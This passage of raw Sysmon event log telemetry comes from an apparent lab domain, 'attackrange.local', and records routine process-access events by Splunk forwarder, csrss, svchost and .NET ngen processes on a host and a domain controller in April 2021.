Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050390Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.103{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EBF5-607E-EC06-00000000BB01}1728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050389Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.104{85C0FFC9-EBF5-607E-EC06-00000000BB01}1728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000050388Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:57.025{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50703A0C00EBF8744B4028C232490D6B,SHA256=A04EEFB43AC8ECF6E146C02365AB2334CE3553A2215D88057566A74A165EC7E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076546Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.592{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}4472C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076545Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.592{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}4472C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076544Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.545{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF6-607E-C20D-00000000BB01}6740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076543Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.529{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}6740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076542Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.529{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}6740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076541Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.514{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF6-607E-C10D-00000000BB01}1648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076540Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.483{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}1648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076539Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.483{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}1648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076538Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.092{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF6-607E-C00D-00000000BB01}4012C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076537Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.076{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}4012C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076536Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.076{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}4012C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076535Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.045{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF6-607E-BF0D-00000000BB01}3000C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076534Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.029{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}3000C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076533Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.029{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}3000C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076532Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.983{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF5-607E-BE0D-00000000BB01}6292C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076531Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.967{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}6292C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076530Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.967{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}6292C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076529Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.936{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF5-607E-BD0D-00000000BB01}7136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076528Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.920{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}7136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076527Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.920{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}7136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076526Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 